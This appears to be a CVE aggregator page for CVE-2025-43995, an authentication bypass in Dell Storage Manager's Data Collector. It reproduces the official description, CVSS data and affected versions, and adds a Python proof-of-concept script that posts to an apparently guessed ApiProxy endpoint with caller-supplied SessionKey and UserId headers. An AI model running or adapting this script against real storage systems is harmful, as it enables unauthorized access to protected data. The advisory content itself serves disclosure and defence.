Security Vulnerability Report
中文
CVE-2025-43995 CVSS 9.8 CRITICAL

CVE-2025-43995

Published: 2025-10-24 15:15:38
Last Modified: 2025-11-04 14:43:05
Source: [email protected]

Description

Dell Storage Center - Dell Storage Manager, version(s) 20.1.21, contain(s) an Improper Authentication vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass. Authentication Bypass in DSM Data Collector. An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId. These userid are special users created in compellentservicesapi for special purposes.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:* - VULNERABLE
Dell Storage Manager 20.1.21
Dell Storage Center (关联版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-43995 PoC - Dell Storage Manager Authentication Bypass # Target: Dell Storage Manager Data Collector (ApiProxy.war) def exploit_dell_storage_manager(target_url, special_session_key, special_user_id): """ Exploit for CVE-2025-43995: Dell Storage Manager Authentication Bypass Args: target_url: Base URL of Dell Storage Manager special_session_key: Special SessionKey from compellentservicesapi special_user_id: Special UserId for special purpose account Returns: Response from the exploited API endpoint """ # Target the ApiProxy.war API endpoint api_endpoint = f"{target_url}/DataCollectorEar/ApiProxy/api/endpoint" # Construct headers with special authentication bypass credentials headers = { 'Content-Type': 'application/json', 'SessionKey': special_session_key, 'UserId': special_user_id } # Payload to access protected API without proper authentication payload = { 'action': 'listStorageCenters', 'options': {} } try: print(f"[*] Targeting: {api_endpoint}") print(f"[*] Using SessionKey: {special_session_key}") print(f"[*] Using UserId: {special_user_id}") # Send crafted request to bypass authentication response = requests.post(api_endpoint, json=payload, headers=headers, timeout=30) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Authentication bypass successful!") return True else: print("[-] Authentication bypass failed or unexpected response") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve_2025_43995_poc.py <target_url> <session_key> <user_id>") print("Example: python cve_2025_43995_poc.py https://dell-sm.example.com 'SPECIAL_KEY' 'SPECIAL_UID'") sys.exit(1) target = sys.argv[1] session_key = sys.argv[2] user_id = sys.argv[3] exploit_dell_storage_manager(target, session_key, user_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43995", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:38.380", "lastModified": "2025-11-04T14:43:05.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Storage Center - Dell Storage Manager, version(s) 20.1.21, contain(s) an Improper Authentication vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass. Authentication Bypass in DSM Data Collector. An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId. These userid are special users created in compellentservicesapi for special purposes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2020", "matchCriteriaId": "F19B1117-55A1-46EC-A046-BE3B99EC4900"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:*", "matchCriteriaId": "567442CC-381B-43A1-ADE9-AE00075021D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:*", "matchCriteriaId": "B978EFB1-877F-4091-A401-F1861229E033"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:*", "matchCriteriaId": "263E78BD-D8C0-480F-9EED-D5496708CFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:*", "matchCriteriaId": "1055DB85-9105-44E5-9CEB-509C7F7041FE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.